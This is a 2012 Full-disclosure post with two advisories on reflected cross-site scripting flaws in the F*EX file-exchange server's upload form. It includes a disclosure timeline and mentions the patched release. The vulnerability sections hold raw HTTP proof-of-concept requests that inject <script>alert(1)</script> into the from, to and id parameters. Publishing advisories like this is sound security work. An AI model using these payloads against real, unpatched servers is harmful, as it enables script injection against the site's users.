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[Full-disclosure] Vulnerabilitites in Debian F*EX <= 20100208 and F*EX 20111129-2.
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- Subject: [Full-disclosure] Vulnerabilitites in Debian F*EX <= 20100208 and F*EX 20111129-2.
- From: muuratsalo experimental hack lab <muuratsalo@xxxxxxxxx>
- Date: Mon, 20 Feb 2012 22:51:08 +0100
Dear all,
I have discovered some vulnerabilitites in Debian F*EX <= 20100208 and
F*EX 20111129-2.
F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user in opposite to the
recipient. The F*EX design scheme is close related to e-mail.
The vulnerabilities are now patched in the version 20120215. It is a major
update which also fixes some other very minor security hints. I decided to
create two advisories because the WWW upload form is slightly different
between the two releases (20100208 and F*EX 20111129-2).
Cheers muuratsalo
Other References: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=660621
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F*EX <= 20100208 Cross Site Scripting Vulnerabilities
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title.............: F*EX <= 20100208 Cross Site Scripting Vulnerabilities
author............: muuratsalo
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://fex.rus.uni-stuttgart.de/fex.html
tested on.........: Debian 6.0.4 (squeeze) - package
fex_20100208+debian1-1+squeeze1_all.deb
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muuratsalo | muuratsalo experimental hack lab is a proud member of the
Revshell.com community
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[0x01] Software overview
F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user in opposite to the
recipient.
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[0x02] Vulnerabilities overview
F*EX <= 20100208 suffers from multiple Cross Site Scripting attacks (Reflected)
in the WWW upload form.
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[0x03] Disclosure timeline
[2012-02-01] - Multiple vulnerabilities discovered and reported to the author
of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied the
suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-20] - Public disclosure
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[0x04] Vulnerabilities
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*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [from
parameter] ***
POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233
----------1922591683
Content-Disposition: form-data; name="id"
----------1922591683
Content-Disposition: form-data; name="to"
----------1922591683
Content-Disposition: form-data; name="from"
38c66<script>alert(1)</script>b08f61c45c6
----------1922591683--
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*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [to
parameter] ***
POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233
----------1922591683
Content-Disposition: form-data; name="id"
----------1922591683
Content-Disposition: form-data; name="to"
38c66<script>alert(1)</script>b08f61c45c6
----------1922591683
Content-Disposition: form-data; name="from"
----------1922591683--
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*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [id
parameter] ***
GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1
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F*EX 20111129-2 Cross Site Scripting Vulnerability
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title.............: F*EX 20111129-2 Cross Site Scripting Vulnerabilities
author............: muuratsalo
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://fex.rus.uni-stuttgart.de/fex.html
tested on.........: Debian wheezy - package fex_20111129-2_all.deb
========================================================================
muuratsalo | muuratsalo experimental hack lab is a proud member of the
Revshell.com community
========================================================================
[0x01] Software overview
F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user in opposite to the
recipient.
========================================================================
[0x02] Vulnerabilities overview
F*EX 20111129-2 suffers from a Cross Site Scripting attack (Reflected) in the
WWW upload form.
========================================================================
[0x03] Disclosure timeline
[2012-02-01] - Multiple vulnerabilities discovered and reported to the author
of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied the
suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-20] - Public disclosure
========================================================================
[0x04] Vulnerability
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*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [id
parameter] ***
GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1
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